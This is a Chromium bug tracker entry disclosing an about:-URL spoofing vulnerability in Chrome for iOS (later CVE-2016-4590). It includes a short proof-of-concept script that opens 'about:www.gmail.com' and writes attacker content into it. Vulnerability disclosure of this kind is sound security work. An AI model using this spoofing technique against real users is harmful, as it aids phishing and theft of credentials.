Issue metadata
Sign in to add a comment
|
Security: Chrome "about-URL" spoofing on IOS
Reported by
xis...@gmail.com,
May 4 2016
|
||||||||||||||||||||
Issue descriptionAgent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/50.0.2661.95 Mobile/13F68 Safari/601.1.4 DESCRIPTION: In Chrome,JS script can control the content of about:URL, such as about:gmail.com, about:www.gmail.com. At the same time, can change the content of the page.An attacker may exploit this vulnerability to spoof an interface of a trusted web site. This vulnerability may aid in phishing style attacks. POC: <script> payload=”…………”; function pwned() { var t = window.open('about:www.gmail.com', 'aaaa'); t.document.write(atob(payload)); } </script> <button onclick="pwned()">GO GO GO</button> Online Demo:http://xisigr.com/test/about/chrome-about.html
,
Sep 18 2016
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: An origin inheritance issue existed in parsing of about: URLs. This was addressed through improved validation of security origins. CVE-2016-4590 : xisigr of Tencent's Xuanwu Lab (www.tencent.com) https://support.apple.com/en-hk/HT206902
,
Oct 2 2016
,
Dec 9 2016
Security>UX component is deprecated in favor of the Team-Security-UX label |
|||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||
Comment 1 by f...@chromium.org
, May 6 2016Labels: -Restrict-View-SecurityTeam
Mergedinto: 466422
Status: Duplicate (was: Unconfirmed)